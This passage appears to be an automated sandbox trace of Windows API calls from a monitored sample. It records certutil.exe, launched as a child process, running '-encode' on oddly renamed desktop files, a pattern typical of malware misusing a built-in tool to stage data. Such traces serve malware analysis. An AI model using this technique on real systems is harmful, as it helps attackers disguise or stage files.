0x20c0269ba20 [0230.450] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x20c026941e0 [0230.450] LocalFree (hMem=0x20c0269e750) returned 0x0 [0230.450] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x51f36ff590 | out: lpSystemTimeAsFileTime=0x51f36ff590*(dwLowDateTime=0xb3f7c6cd, dwHighDateTime=0x1d6141f)) [0230.450] GetLocalTime (in: lpSystemTime=0x51f36ff5c8 | out: lpSystemTime=0x51f36ff5c8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x4, wMilliseconds=0x3de)) [0230.450] SystemTimeToFileTime (in: lpSystemTime=0x51f36ff5c8, lpFileTime=0x51f36ff5a0 | out: lpFileTime=0x51f36ff5a0) returned 1 [0230.450] CompareFileTime (lpFileTime1=0x51f36ff5a0, lpFileTime2=0x51f36ff590) returned 1 [0230.451] _vsnwprintf (in: _Buffer=0x51f36ff5d8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x51f36ff568 | out: _Buffer="GMT + 2.00") returned 10 [0230.451] LocalFree (hMem=0x20c0269bb20) returned 0x0 [0230.451] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0230.451] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0230.451] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0230.451] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0230.451] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0230.451] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x51f36ff608 | out: _Buffer="10.0.15063.447") returned 14 [0230.451] GetACP () returned 0x4e4 [0230.451] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0230.452] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x20c0269bee0 [0230.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x20c0269bee0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0230.452] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x20c0269e790 [0230.452] _vsnwprintf (in: _Buffer=0x20c0269e790, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x51f36ff658 | out: _Buffer="10.0.15063.447 retail") returned 21 [0230.452] LocalFree (hMem=0x20c0269bee0) returned 0x0 [0230.452] LocalFree (hMem=0x0) returned 0x0 [0230.452] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0230.452] GetACP () returned 0x4e4 [0230.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0230.452] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x20c0269bd80 [0230.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x20c0269bd80, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0230.452] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x20c0269e6d0 [0230.453] _vsnwprintf (in: _Buffer=0x20c0269e6d0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x51f36ff658 | out: _Buffer="10.0.15063.447 retail") returned 21 [0230.453] LocalFree (hMem=0x20c0269bd80) returned 0x0 [0230.453] LocalFree (hMem=0x0) returned 0x0 [0230.453] GetACP () returned 0x4e4 [0230.453] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0230.453] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x20c0269b820 [0230.453] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x20c0269b820, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0230.453] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x20c0269e810 [0230.453] _vsnwprintf (in: _Buffer=0x20c0269e810, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x51f36ff688 | out: _Buffer="10.0.15063.447 retail") returned 21 [0230.453] LocalFree (hMem=0x20c0269b820) returned 0x0 [0230.453] LocalFree (hMem=0x20c0269e790) returned 0x0 [0230.453] LocalFree (hMem=0x20c0269e6d0) returned 0x0 [0230.453] LocalFree (hMem=0x20c0269e810) returned 0x0 [0230.453] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0230.453] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0230.453] GetStockObject (i=0) returned 0x900010 [0230.454] RegisterClassW (lpWndClass=0x51f36ff7b0) returned 0xc1a2 [0230.454] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x702c6 [0230.539] NtdllDefWindowProc_W () returned 0x0 [0230.540] NtdllDefWindowProc_W () returned 0x1 [0230.547] NtdllDefWindowProc_W () returned 0x0 [0230.557] UpdateWindow (hWnd=0x702c6) returned 1 [0230.557] PostMessageW (hWnd=0x702c6, Msg=0x400, wParam=0x0, lParam=0x20c0268217e) returned 1 [0230.557] GetMessageW (in: lpMsg=0x51f36ff800, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x51f36ff800) returned 1 [0230.558] TranslateMessage (lpMsg=0x51f36ff800) returned 0 [0230.558] DispatchMessageW (lpMsg=0x51f36ff800) returned 0x0 [0230.558] NtdllDefWindowProc_W () returned 0x0 [0230.558] GetMessageW (in: lpMsg=0x51f36ff800, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x51f36ff800) returned 1 [0230.558] TranslateMessage (lpMsg=0x51f36ff800) returned 0 [0230.558] DispatchMessageW (lpMsg=0x51f36ff800) returned 0x0 [0230.558] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x20c0268f2e0 [0230.558] LocalAlloc (uFlags=0x0, uBytes=0x6a) returned 0x20c026843d0 [0230.559] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0230.559] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0230.559] SetLastError (dwErrCode=0x80070716) [0230.559] _vsnwprintf (in: _Buffer=0x51f36ff208, _BufferCount=0xb, _Format="%d", _ArgList=0x51f36ff1f8 | out: _Buffer="465") returned 3 [0230.559] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x51f36fefc0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0230.559] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x20c0268b920 [0230.559] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0230.559] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0230.559] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x51f36fefa0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0230.559] GetLastError () returned 0xcb [0230.560] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0230.560] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0230.560] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0230.560] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0230.560] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0230.560] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0230.560] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0230.560] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0230.560] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0230.560] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0230.560] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0230.560] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0230.560] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0230.560] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0230.560] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0230.560] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0230.560] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0230.560] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0230.560] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0230.560] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0230.560] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0230.561] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x51f36fec68 | out: phkResult=0x51f36fec68*=0x23c) returned 0x0 [0230.561] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x20c02688520 [0230.561] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x51f36ff1d8, lpData=0x51f36ff208, lpcbData=0x51f36ff1d0*=0x4 | out: lpType=0x51f36ff1d8*=0x0, lpData=0x51f36ff208*=0x0, lpcbData=0x51f36ff1d0*=0x4) returned 0x2 [0230.561] LocalFree (hMem=0x20c02688520) returned 0x0 [0230.561] RegCloseKey (hKey=0x23c) returned 0x0 [0230.561] LocalFree (hMem=0x0) returned 0x0 [0230.561] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x20c026ae050 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0230.610] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0230.610] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0230.610] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x20c026b2fa0 [0230.611] GetComputerNameW (in: lpBuffer=0x20c026b2fa0, nSize=0x51f36ff1d0 | out: lpBuffer="NQDPDE", nSize=0x51f36ff1d0) returned 1 [0230.611] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x51f36ff1a0 | out: lpBuffer=0x0, nSize=0x51f36ff1a0) returned 0 [0230.611] GetLastError () returned 0xea [0230.611] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x20c0269bde0 [0230.611] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x20c0269bde0, nSize=0x51f36ff1a0 | out: lpBuffer="NQdPdE", nSize=0x51f36ff1a0) returned 1 [0230.612] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0230.615] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x20c026b3190, cbCertEncoded=0xdffe) returned 0x0 [0230.620] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x20c026b3190, cbCrlEncoded=0xdffe) returned 0x0 [0230.622] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x20c026b3190, cbEncoded=0xdffe, dwFlags=0x8000, pDecodePara=0x51f36ff080, pvStructInfo=0x51f36ff110, pcbStructInfo=0x51f36ff104 | out: pvStructInfo=0x51f36ff110, pcbStructInfo=0x51f36ff104) returned 0 [0230.622] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x20c026b3190, cbEncoded=0xdffe, dwFlags=0x8000, pDecodePara=0x51f36ff080, pvStructInfo=0x51f36ff110, pcbStructInfo=0x51f36ff104 | out: pvStructInfo=0x51f36ff110, pcbStructInfo=0x51f36ff104) returned 0 [0230.622] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x20c026b3190, cbEncoded=0xdffe, dwFlags=0x8000, pDecodePara=0x51f36ff080, pvStructInfo=0x51f36ff110, pcbStructInfo=0x51f36ff104 | out: pvStructInfo=0x51f36ff110, pcbStructInfo=0x51f36ff104) returned 0 [0230.622] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x20c02695630 [0230.632] CryptMsgUpdate (hCryptMsg=0x20c02695630, pbData=0x20c026b3190, cbData=0xdffe, fFinal=1) returned 0 [0230.632] GetLastError () returned 0x8009310b [0230.632] CryptMsgClose (hCryptMsg=0x20c02695630) returned 1 [0230.633] GetFileAttributesExW (in: lpFileName="jQv-1A.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\jqv-1a.gif.sister"), fInfoLevelId=0x0, lpFileInformation=0x51f36ff130 | out: lpFileInformation=0x51f36ff130*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0047750, ftCreationTime.dwHighDateTime=0x1d5e9db, ftLastAccessTime.dwLowDateTime=0xc70c040, ftLastAccessTime.dwHighDateTime=0x1d5e8b8, ftLastWriteTime.dwLowDateTime=0xc70c040, ftLastWriteTime.dwHighDateTime=0x1d5e8b8, nFileSizeHigh=0x0, nFileSizeLow=0xdffe)) returned 1 [0230.633] _vsnwprintf (in: _Buffer=0x51f36ff138, _BufferCount=0xb, _Format="%d", _ArgList=0x51f36ff128 | out: _Buffer="359") returned 3 [0230.633] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x51f36feef0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0230.633] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x20c026b2f10 [0230.633] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0230.633] _vsnwprintf (in: _Buffer=0x51f36fe120, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x51f36ff178 | out: _Buffer="Input Length = 57342") returned 20 [0230.633] GetFileType (hFile=0x50) returned 0x2 [0230.633] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x51f36fe120*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x51f36fe0d4, lpReserved=0x0 | out: lpBuffer=0x51f36fe120*, lpNumberOfCharsWritten=0x51f36fe0d4*=0x14) returned 1 [0230.738] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0230.738] _vsnwprintf (in: _Buffer=0x51f36fe120, _BufferCount=0x1ff, _Format="\n", _ArgList=0x51f36ff178 | out: _Buffer="\n") returned 1 [0230.738] GetFileType (hFile=0x50) returned 0x2 [0230.738] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x51f36fe120*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x51f36fe0d4, lpReserved=0x0 | out: lpBuffer=0x51f36fe120*, lpNumberOfCharsWritten=0x51f36fe0d4*=0x1) returned 1 [0230.901] GetFileAttributesExW (in: lpFileName="jQv-1A.gif.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\jqv-1a.gif.cruel"), fInfoLevelId=0x0, lpFileInformation=0x51f36ff130 | out: lpFileInformation=0x51f36ff130*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb42f9f3f, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xb42f9f3f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb436953b, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x13436)) returned 1 [0230.902] _vsnwprintf (in: _Buffer=0x51f36ff138, _BufferCount=0xb, _Format="%d", _ArgList=0x51f36ff128 | out: _Buffer="361") returned 3 [0230.902] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x51f36feef0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0230.902] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x20c026b2d60 [0230.902] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0230.902] _vsnwprintf (in: _Buffer=0x51f36fe120, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x51f36ff178 | out: _Buffer="Output Length = 78902") returned 21 [0230.902] GetFileType (hFile=0x50) returned 0x2 [0230.902] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x51f36fe120*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x51f36fe0d4, lpReserved=0x0 | out: lpBuffer=0x51f36fe120*, lpNumberOfCharsWritten=0x51f36fe0d4*=0x15) returned 1 [0230.973] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0230.973] _vsnwprintf (in: _Buffer=0x51f36fe120, _BufferCount=0x1ff, _Format="\n", _ArgList=0x51f36ff178 | out: _Buffer="\n") returned 1 [0230.973] GetFileType (hFile=0x50) returned 0x2 [0230.973] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x51f36fe120*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x51f36fe0d4, lpReserved=0x0 | out: lpBuffer=0x51f36fe120*, lpNumberOfCharsWritten=0x51f36fe0d4*=0x1) returned 1 [0231.052] LocalFree (hMem=0x20c026b3190) returned 0x0 [0231.053] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0231.053] _vsnwprintf (in: _Buffer=0x51f36ff198, _BufferCount=0xb, _Format="%d", _ArgList=0x51f36ff188 | out: _Buffer="2022") returned 4 [0231.053] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x51f36fef50, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0231.053] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x20c02688a60 [0231.053] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0231.053] _vsnwprintf (in: _Buffer=0x51f36fe180, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x51f36ff1d8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0231.053] GetFileType (hFile=0x50) returned 0x2 [0231.053] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x51f36fe180*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x51f36fe134, lpReserved=0x0 | out: lpBuffer=0x51f36fe180*, lpNumberOfCharsWritten=0x51f36fe134*=0x31) returned 1 [0231.131] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0231.131] _vsnwprintf (in: _Buffer=0x51f36fe180, _BufferCount=0x1ff, _Format="\n", _ArgList=0x51f36ff1d8 | out: _Buffer="\n") returned 1 [0231.131] GetFileType (hFile=0x50) returned 0x2 [0231.131] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x51f36fe180*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x51f36fe134, lpReserved=0x0 | out: lpBuffer=0x51f36fe180*, lpNumberOfCharsWritten=0x51f36fe134*=0x1) returned 1 [0231.254] LocalFree (hMem=0x0) returned 0x0 [0231.255] LocalFree (hMem=0x20c026843d0) returned 0x0 [0231.255] LocalFree (hMem=0x20c0268f2e0) returned 0x0 [0231.255] SetLastError (dwErrCode=0x80070716) [0231.255] _vsnwprintf (in: _Buffer=0x51f36ff208, _BufferCount=0xb, _Format="%d", _ArgList=0x51f36ff1f8 | out: _Buffer="511") returned 3 [0231.255] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x51f36fefc0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0231.255] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x20c026b2fd0 [0231.255] PostQuitMessage (nExitCode=0) [0231.255] GetMessageW (in: lpMsg=0x51f36ff800, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x51f36ff800) returned 0 [0231.255] LocalFree (hMem=0x20c0269bde0) returned 0x0 [0231.255] LocalFree (hMem=0x20c026b2fa0) returned 0x0 [0231.255] LocalFree (hMem=0x0) returned 0x0 [0231.256] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0231.256] GetLastError () returned 0x7e [0231.256] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0231.257] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0231.257] DllMain () returned 0x1 [0231.257] LocalFree (hMem=0x20c0269ba20) returned 0x0 [0231.257] LocalFree (hMem=0x20c0268b920) returned 0x0 [0231.257] LocalFree (hMem=0x20c026b2f10) returned 0x0 [0231.257] LocalFree (hMem=0x20c026b2d60) returned 0x0 [0231.257] LocalFree (hMem=0x20c02688a60) returned 0x0 [0231.257] LocalFree (hMem=0x20c026b2fd0) returned 0x0 [0231.257] LocalFree (hMem=0x20c026941e0) returned 0x0 [0231.257] LocalFree (hMem=0x20c0268bd10) returned 0x0 [0231.257] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0231.257] GetLastError () returned 0x7e [0231.258] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0231.258] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0231.258] DllMain () returned 0x1 [0231.258] exit (_Code=0) Thread: id = 58 os_tid = 0xf44 Thread: id = 59 os_tid = 0xf78 Process: id = "20" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x2a941000" os_pid = "0x55c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"JyNR.mp3.Sister\" \"JyNR.mp3.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 60 os_tid = 0xe9c [0232.110] GetStartupInfoW (in: lpStartupInfo=0xf24c47faa0 | out: lpStartupInfo=0xf24c47faa0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"JyNR.mp3.Sister\" \"JyNR.mp3.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0232.116] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0232.116] __set_app_type (_Type=0x1) [0232.117] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0232.117] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0232.119] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0232.120] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0232.120] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0232.120] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0232.120] WerSetFlags () returned 0x0 [0232.121] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0232.121] __iob_func () returned 0x7ffcea2dea00 [0232.121] _fileno (_File=0x7ffcea2dea30) returned 1 [0232.121] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0232.121] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0232.122] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0232.123] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0232.123] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0232.123] GetConsoleOutputCP () returned 0x1b5 [0232.193] _vsnwprintf (in: _Buffer=0xf24c47fa10, _BufferCount=0xb, _Format=".%d", _ArgList=0xf24c47f938 | out: _Buffer=".437") returned 4 [0232.193] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0232.193] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0232.193] GetFileType (hFile=0x50) returned 0x2 [0232.194] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0232.194] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0232.194] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.320] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0232.320] GetCommandLineW () returned="certutil -encode \"JyNR.mp3.Sister\" \"JyNR.mp3.Cruel\"" [0232.320] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x24063d8ba50 [0232.320] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x24063d7cf30 [0232.320] LocalFree (hMem=0x24063d8ba50) returned 0x0 [0232.321] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x24063d7c0a0 